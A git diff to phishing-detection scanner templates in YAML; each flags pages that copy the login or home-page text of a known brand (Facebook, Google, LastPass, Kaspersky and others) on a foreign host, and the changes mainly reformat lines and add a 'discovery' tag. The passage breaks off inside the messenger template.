ESET' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,eset,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Malware Protection & Internet Security | ESET' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"eset.com")' # digest: 4a0a00473045022100fdc829be749ee321e6ba2f2785875659cec61763c764690f2dd5ec6763889c0e02202a4543dbc5f9d88a08eb6281cf4940f70f30cac2a391d5ccbb208474b6c5ae3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/evernote-phish.yaml b/http/osint/phishing/evernote-phish.yaml index 3bc758ec85a..0fd469a7149 100644 --- a/http/osint/phishing/evernote-phish.yaml +++ b/http/osint/phishing/evernote-phish.yaml @@ -1,5 +1,5 @@ -id: evernote-phish - +id: evernote-phish + info: name: evernote phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://evernote.com metadata: max-request: 1 - tags: phishing,evernote,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Best Note Taking App - Organize Your Notes with Evernote' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,evernote,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Best Note Taking App - Organize Your Notes with Evernote' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"evernote.com")' # digest: 490a0046304402207dd8250bcf66681ae68117bfb087e6badba28d5d7ca2c086a3109a57b03ea76102202a870b3433ca8c8f43916b4e8acbb4cf97342289e4c18d101f382727792147c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/facebook-phish.yaml b/http/osint/phishing/facebook-phish.yaml index 81b6cab3ae2..73b1c0e4156 100644 --- a/http/osint/phishing/facebook-phish.yaml +++ b/http/osint/phishing/facebook-phish.yaml @@ -1,5 +1,5 @@ -id: facebook-phish - +id: facebook-phish + info: name: Facebook phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://facebook.com metadata: max-request: 1 - tags: phishing,facebook,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Facebook – log in or sign up' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,facebook,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Facebook – log in or sign up' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"facebook.com")' # digest: 4b0a00483046022100b130284f6a0a84959a71820b7dbe55bf96b8496da78c07a5fe87bbdf9fcb6362022100fa622034663e5a741e4b6ae47b903e578c052b169fd9ae2c48b2b359e903fdb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/figma-phish.yaml b/http/osint/phishing/figma-phish.yaml index fe4c71f0957..6842c2ceb0b 100644 --- a/http/osint/phishing/figma-phish.yaml +++ b/http/osint/phishing/figma-phish.yaml @@ -1,5 +1,5 @@ -id: figma-phish - +id: figma-phish + info: name: figma phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://figma.com metadata: max-request: 1 - tags: phishing,figma,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Figma: The Collaborative Interface Design Tool' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,figma,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Figma: The Collaborative Interface Design Tool' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"figma.com")' # digest: 490a00463044022049ccd3cd80f9f06a40564bf20fc1a6622e22cdc92e05b45f188367afb87c94c2022040e991f5eea53fa1673a05759cc937a4befd3e4f43eaf9fbdfd840fbd3967e1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/filezilla-phish.yaml b/http/osint/phishing/filezilla-phish.yaml index 3f35046e4b3..164b9dd82f5 100644 --- a/http/osint/phishing/filezilla-phish.yaml +++ b/http/osint/phishing/filezilla-phish.yaml @@ -1,5 +1,5 @@ -id: filezilla-phish - +id: filezilla-phish + info: name: filezilla phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://filezilla-project.org metadata: max-request: 1 - tags: phishing,filezilla,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'FileZilla - The free FTP solution' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,filezilla,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'FileZilla - The free FTP solution' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"filezilla-project.org")' # digest: 4a0a00473045022043d77ef8689b6573dfdd7b59f2845d07de043ac992f07f8577ca3ca157a595610221009d4789041223f39c620c958f9478da9f8887f1fceb4c53412d334dcc2cfedc6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/firefox-phish.yaml b/http/osint/phishing/firefox-phish.yaml index 4bf07018d2a..a4dc6f4fb21 100644 --- a/http/osint/phishing/firefox-phish.yaml +++ b/http/osint/phishing/firefox-phish.yaml @@ -1,5 +1,5 @@ -id: firefox-phish - +id: firefox-phish + info: name: firefox phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://www.mozilla.org/en-GB/firefox/new/ metadata: max-request: 1 - tags: phishing,firefox,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Download Firefox for Desktop — Mozilla' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,firefox,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Download Firefox for Desktop — Mozilla' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"mozilla.org")' # digest: 4a0a0047304502204fab100a79e6fd66fa63ac1c4b43c2ba3f3b8f6b64f6e97b39287f64507eb15f022100e2dababf3653e1db91d5d4c774293bfc13522051b914cd6c16f6ed07c4f709cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/gimp-phish.yaml b/http/osint/phishing/gimp-phish.yaml index 274e7b5be39..fc482315fe4 100644 --- a/http/osint/phishing/gimp-phish.yaml +++ b/http/osint/phishing/gimp-phish.yaml @@ -1,5 +1,5 @@ -id: gimp-phish - +id: gimp-phish + info: name: gimp phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://gimp.org metadata: max-request: 1 - tags: phishing,gimp,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'GIMP - GNU Image Manipulation Program' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,gimp,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'GIMP - GNU Image Manipulation Program' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"gimp.org")' # digest: 4a0a0047304502207f451e99677330c31a01a31ab466a26856cb8e1719e62105e5f24aed938d8ed90221008b0b31f41cc7c5df082a09e825aef2f88934d1e67aae820f39292e017b21be5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/github-phish.yaml b/http/osint/phishing/github-phish.yaml index 22baa6e0ff1..da862f5e727 100644 --- a/http/osint/phishing/github-phish.yaml +++ b/http/osint/phishing/github-phish.yaml @@ -1,5 +1,5 @@ -id: github-phish - +id: github-phish + info: name: github phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://github.com metadata: max-request: 1 - tags: phishing,github,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in to GitHub · GitHub' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,github,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in to GitHub · GitHub' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"github.com")' # digest: 4b0a00483046022100d90d5e866d337aeeda0af95d22251f6a35470e1a8e5a5ef1cc20b0f93428ffff022100e1aba641664e714b354957faa13021fac90454bf24046fa0785afe308d6ac8fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/google-phish.yaml b/http/osint/phishing/google-phish.yaml index c9d195faae7..69539c0d507 100644 --- a/http/osint/phishing/google-phish.yaml +++ b/http/osint/phishing/google-phish.yaml @@ -1,5 +1,5 @@ -id: google-phish - +id: google-phish + info: name: Google phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://google.com metadata: max-request: 1 - tags: phishing,google,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Sign in - Google Accounts' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,google,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Sign in - Google Accounts' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"google.com")' # digest: 4a0a00473045022056f3a330b633be547ba1fbdc92a8f0e984f61e057acb37f3758015b8c8f026cf022100d9b6607c300bf4245e72296258d15e90d579aa208d5ad7a6d059919ff147beb6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/icloud-phish.yaml b/http/osint/phishing/icloud-phish.yaml index 946441ec96f..9153995e1a0 100644 --- a/http/osint/phishing/icloud-phish.yaml +++ b/http/osint/phishing/icloud-phish.yaml @@ -1,5 +1,5 @@ -id: iCloud-phish - +id: iCloud-phish + info: name: iCloud phishing Detection author: rxerium @@ -10,28 +10,28 @@ info: - https://icloud.com metadata: max-request: 1 - tags: phishing,icloud,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Log in to iCloud to access your photos, mail, notes, documents and more. Sign in with your Apple ID or create a new account to start using Apple services.' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"icloud.com")' - - '!contains(host,"apple.com")' + tags: phishing,icloud,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Log in to iCloud to access your photos, mail, notes, documents and more. Sign in with your Apple ID or create a new account to start using Apple services.' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"icloud.com")' + - '!contains(host,"apple.com")' condition: and # digest: 4a0a0047304502202ef7bcb391ef030a53e3c94181d31894530bb50c937394c9733bed0ba16ed5f6022100e7370c2e8bc0e87d5b91f340d0005179042b38497328898ea20e5fd460d1c222:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/instagram-phish.yaml b/http/osint/phishing/instagram-phish.yaml index d6d22506c8d..966f9851dca 100644 --- a/http/osint/phishing/instagram-phish.yaml +++ b/http/osint/phishing/instagram-phish.yaml @@ -1,5 +1,5 @@ -id: instagram-phish - +id: instagram-phish + info: name: instagram phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://instagram.com metadata: max-request: 1 - tags: phishing,instagram,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Login • Instagram' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,instagram,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Login • Instagram' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"instagram.com")' # digest: 4b0a00483046022100dda661d1abeb0962fe9cc0e216b27038c2ccb5a564e37c9a5232556881c219ef022100bd2f04f03c66d302009f9c37aacb3f74bc7f2cb18b66e175b5fa82ff62ba6412:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/kakao-login-phish.yaml b/http/osint/phishing/kakao-login-phish.yaml index 612111c854f..900d0a77546 100644 --- a/http/osint/phishing/kakao-login-phish.yaml +++ b/http/osint/phishing/kakao-login-phish.yaml @@ -1,5 +1,5 @@ -id: kakao-login-phish - +id: kakao-login-phish + info: name: kakao login phishing Detection author: hahwul @@ -11,29 +11,29 @@ info: - https://www.kakaocorp.com metadata: max-request: 1 - tags: phishing,kakao,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - '카카오계정' + tags: phishing,kakao,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - '카카오계정' - '로그인' - '계정 찾기' - '비밀번호 찾기' - - - type: status - status: - - 200 - - - type: dsl - dsl: + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"accounts.kakao.com")' # digest: 490a0046304402205ab443f11bd929c261dbc9ca03d2329b4687b17561d602ee6adefda755ff929b022038b471508c0ec708c194fbb9260dade5fdae3568f0a85a512a74e6c6501fccf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/kaspersky-phish.yaml b/http/osint/phishing/kaspersky-phish.yaml index b6d57585003..58df5474979 100644 --- a/http/osint/phishing/kaspersky-phish.yaml +++ b/http/osint/phishing/kaspersky-phish.yaml @@ -1,5 +1,5 @@ -id: kaspersky-phish - +id: kaspersky-phish + info: name: kaspersky phishing Detection author: rxerium @@ -10,27 +10,27 @@ info: - https://kaspersky.co.uk metadata: max-request: 1 - tags: phishing,kaspersky,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Kaspersky Cyber Security Solutions for Home and Business | Kaspersky' - - - type: status - status: - - 200 - - - type: dsl - dsl: - - '!contains(host,"kaspersky.co.uk")' + tags: phishing,kaspersky,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Kaspersky Cyber Security Solutions for Home and Business | Kaspersky' + + - type: status + status: + - 200 + + - type: dsl + dsl: + - '!contains(host,"kaspersky.co.uk")' - '!contains(host,"kaspersky.com")' # digest: 4a0a00473045022100cd6883a8d8fbd8d62cbef08b25cd91fea34e7d08ae6284c745b98bb0134423c80220017c1b44206ea5194c5251908ae78939750e88aa5ef567e1c1478313c96f77c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/kayak-phish.yaml b/http/osint/phishing/kayak-phish.yaml index 93fea430d14..52cb6e801d4 100644 --- a/http/osint/phishing/kayak-phish.yaml +++ b/http/osint/phishing/kayak-phish.yaml @@ -1,5 +1,5 @@ -id: kayak-phish - +id: kayak-phish + info: name: kayak phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://kayak.co.uk metadata: max-request: 1 - tags: phishing,kayak,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Search Flights, Hotels & Car Hire | KAYAK' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,kayak,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Search Flights, Hotels & Car Hire | KAYAK' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"kayak.co.uk")' # digest: 4a0a0047304502210092adb5308af69f39d9bce0a65d87abe941aa4caac58ca1e53c3e69a18104d13f022024026c90a5fbb4532dcf922500256e1cd762d66fa36f6fbf1ffd71c6c298512d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/keepass-phish.yaml b/http/osint/phishing/keepass-phish.yaml index 3103bc0f3fc..d2df9d4cb32 100644 --- a/http/osint/phishing/keepass-phish.yaml +++ b/http/osint/phishing/keepass-phish.yaml @@ -1,5 +1,5 @@ -id: keepass-phish - +id: keepass-phish + info: name: keepass phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://keepass.info metadata: max-request: 1 - tags: phishing,keepass,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'KeePass is a free open source password manager. Passwords can be stored in an encrypted database, which can be unlocked with one master key.' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,keepass,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'KeePass is a free open source password manager. Passwords can be stored in an encrypted database, which can be unlocked with one master key.' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"keepass.info")' # digest: 4a0a0047304502200d51fdf4b7ec95d8bf9beb8fb9afe3c5459cfdd92cb5e87d2c00d74983e41209022100f7b8c7b856d65a93c825d3b3050c420530416d3b351eea516fe6dc5fa2a7f963:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/keepersecurity-phish.yaml b/http/osint/phishing/keepersecurity-phish.yaml index daf93ffeada..6b1eaa89542 100644 --- a/http/osint/phishing/keepersecurity-phish.yaml +++ b/http/osint/phishing/keepersecurity-phish.yaml @@ -1,5 +1,5 @@ -id: keepersecurity-phish - +id: keepersecurity-phish + info: name: keepersecurity phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://keepersecurity.com metadata: max-request: 1 - tags: phishing,keepersecurity,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Password and Secrets Management - Keeper Security' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,keepersecurity,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Password and Secrets Management - Keeper Security' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"keepersecurity.com")' # digest: 4b0a00483046022100ae16e1ba6f78f8a415c3393c9803958df1daa6602bc0a420a2552208cceee4fb0221009771a8ff5b2be3d136cf1fc27ea04ed096a27f6bb7a9567c57dddef033e48ae8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/keybase-phish.yaml b/http/osint/phishing/keybase-phish.yaml index 4f5c7e752ed..3fa45209d6b 100644 --- a/http/osint/phishing/keybase-phish.yaml +++ b/http/osint/phishing/keybase-phish.yaml @@ -1,5 +1,5 @@ -id: keybase-phish - +id: keybase-phish + info: name: keybase phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://keybase.io metadata: max-request: 1 - tags: phishing,keybase,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - "Keybase is for keeping everyone's chats and files safe, from families to communities to companies. MacOS, Windows, Linux, iPhone, and Android." - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,keybase,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - "Keybase is for keeping everyone's chats and files safe, from families to communities to companies. MacOS, Windows, Linux, iPhone, and Android." + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"keybase.io")' # digest: 4b0a0048304602210081d91fa1ab0ae096aa3c16dba0739bcd473bbbd25a5976db3e84636917a5ccfa022100d621584fd23008d8beb5105a8f987567147f638f661525cd1bb516d8f2f44eea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/lastpass-phish.yaml b/http/osint/phishing/lastpass-phish.yaml index 9c14cd83925..71749ccc957 100644 --- a/http/osint/phishing/lastpass-phish.yaml +++ b/http/osint/phishing/lastpass-phish.yaml @@ -1,5 +1,5 @@ -id: lastpass-phish - +id: lastpass-phish + info: name: lastpass phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://lastpass.com metadata: max-request: 1 - tags: phishing,lastpass,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - '#1 Password Manager & Vault App with Single-Sign On & MFA Solutions - LastPass' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,lastpass,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - '#1 Password Manager & Vault App with Single-Sign On & MFA Solutions - LastPass' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"lastpass.com")' # digest: 4a0a0047304502202b8e120d2f0ae0344829e37be1167c9bf4b9f1a24e2060903cf45eae6fe18c76022100e501b4595f05d01fb2775138a309f1ed3059d47d0428500aab09f77d2e732491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/libre-office-phish.yaml b/http/osint/phishing/libre-office-phish.yaml index 1c51abda5c1..2d213e7abc0 100644 --- a/http/osint/phishing/libre-office-phish.yaml +++ b/http/osint/phishing/libre-office-phish.yaml @@ -1,5 +1,5 @@ -id: libre-office-phish - +id: libre-office-phish + info: name: libre office phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://libreoffice.org metadata: max-request: 1 - tags: phishing,libre-office,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Home | LibreOffice - Free Office Suite - Based on OpenOffice - Compatible with Microsoft' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,libre-office,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Home | LibreOffice - Free Office Suite - Based on OpenOffice - Compatible with Microsoft' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"libreoffice.org")' # digest: 4b0a00483046022100910a28f38bfeee108ab3440765e67f78f741234c541b88fef43865dd6adbcd5b022100f932120557a887c5c056bbd3befd3b3b75fab82c03b9768de55256978dcf2b1a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/linkedin-phish.yaml b/http/osint/phishing/linkedin-phish.yaml index 99d00ce42db..fede8a07005 100644 --- a/http/osint/phishing/linkedin-phish.yaml +++ b/http/osint/phishing/linkedin-phish.yaml @@ -1,5 +1,5 @@ -id: linkedin-phish - +id: linkedin-phish + info: name: linkedin phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://linkedin.com metadata: max-request: 1 - tags: phishing,linkedin,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'LinkedIn: Log In or Sign Up' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,linkedin,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'LinkedIn: Log In or Sign Up' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"linkedin.com")' # digest: 490a00463044022014e9a98d207f7d3411ed9cf30229b2534052ed73183ff7bf13ef65b4dc6db6ba02203b57a9af6384f84db5c532c54b4399e16f1a335574365dd3ba8d280d69fa501e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/malwarebytes-phish.yaml b/http/osint/phishing/malwarebytes-phish.yaml index 34f47f50bc0..2cf24b0b76a 100644 --- a/http/osint/phishing/malwarebytes-phish.yaml +++ b/http/osint/phishing/malwarebytes-phish.yaml @@ -1,5 +1,5 @@ -id: malwarebytes-phish - +id: malwarebytes-phish + info: name: malwarebytes phishing Detection author: rxerium @@ -10,28 +10,28 @@ info: - https://malwarebytes.com metadata: max-request: 1 - tags: phishing,malwarebytes,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Cyber Security Software and Anti-Malware | Malwarebytes' - - 'Protect your home and business PCs, Macs, iOS and Android devices from the latest cyber threats and malware, including ransomware.' - condition: and - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,malwarebytes,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Cyber Security Software and Anti-Malware | Malwarebytes' + - 'Protect your home and business PCs, Macs, iOS and Android devices from the latest cyber threats and malware, including ransomware.' + condition: and + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"malwarebytes.com")' # digest: 490a0046304402204d0a7c3a043a6a1e89ae7f1d8b61c1b00e90ac9dc779997ceec0b677ff008b7b0220549f2048d329662f6b8d285ba1df35e4b86d5895398f0c4a1639a8b3ae43b3cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/mcafee-phish.yaml b/http/osint/phishing/mcafee-phish.yaml index 8a88918a8f9..b16710607e3 100644 --- a/http/osint/phishing/mcafee-phish.yaml +++ b/http/osint/phishing/mcafee-phish.yaml @@ -1,5 +1,5 @@ -id: mcafee-phish - +id: mcafee-phish + info: name: mcafee phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://mcafee.com metadata: max-request: 1 - tags: phishing,mcafee,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Antivirus, VPN, Identity & Privacy Protection | McAfee' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,mcafee,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Antivirus, VPN, Identity & Privacy Protection | McAfee' + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"mcafee.com")' # digest: 4a0a0047304502203a19b2acc75a3fca9b2df2668c11880b5496ecb86e97414022b39264cd6b3d65022100a19a4382b06157fe790ea52691bfc7c786933da50cedcb1cace1a74bfa0d3bb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/mega-phish.yaml b/http/osint/phishing/mega-phish.yaml index 5cf4ceedb9a..844f5de986f 100644 --- a/http/osint/phishing/mega-phish.yaml +++ b/http/osint/phishing/mega-phish.yaml @@ -1,5 +1,5 @@ -id: mega-phish - +id: mega-phish + info: name: mega phishing Detection author: rxerium @@ -10,28 +10,28 @@ info: - https://mega.io metadata: max-request: 1 - tags: phishing,mega,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Home - MEGA' - - 'Secure and private cloud storage for everyone. Store and share files, chat, meet, back up, sync, and more.' - condition: and - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,mega,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Home - MEGA' + - 'Secure and private cloud storage for everyone. Store and share files, chat, meet, back up, sync, and more.' + condition: and + + - type: status + status: + - 200 + + - type: dsl + dsl: - '!contains(host,"mega.io")' # digest: 490a0046304402206474d7c96b57017d4c8f7233f844d317ee0d703b073407245ca532bf29d9dee202200d8d593ecb85495c04cf133c1477d92171cb9c95bf2aaaa91fe57d7f952a246c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/osint/phishing/messenger-phish.yaml b/http/osint/phishing/messenger-phish.yaml index f5eb0122645..b1d35f41afb 100644 --- a/http/osint/phishing/messenger-phish.yaml +++ b/http/osint/phishing/messenger-phish.yaml @@ -1,5 +1,5 @@ -id: messenger-phish - +id: messenger-phish + info: name: messenger phishing Detection author: rxerium @@ -10,26 +10,26 @@ info: - https://messenger.com metadata: max-request: 1 - tags: phishing,messenger,osint -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'Hang out anytime, anywhere—Messenger makes it easy and fun to stay close to your favorite people' - - - type: status - status: - - 200 - - - type: dsl - dsl: + tags: phishing,messenger,osint,discovery +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - 'Hang out anytime, anywhere—Messenger makes it easy and fun to stay close to your favorite people' + + - type: status + status: 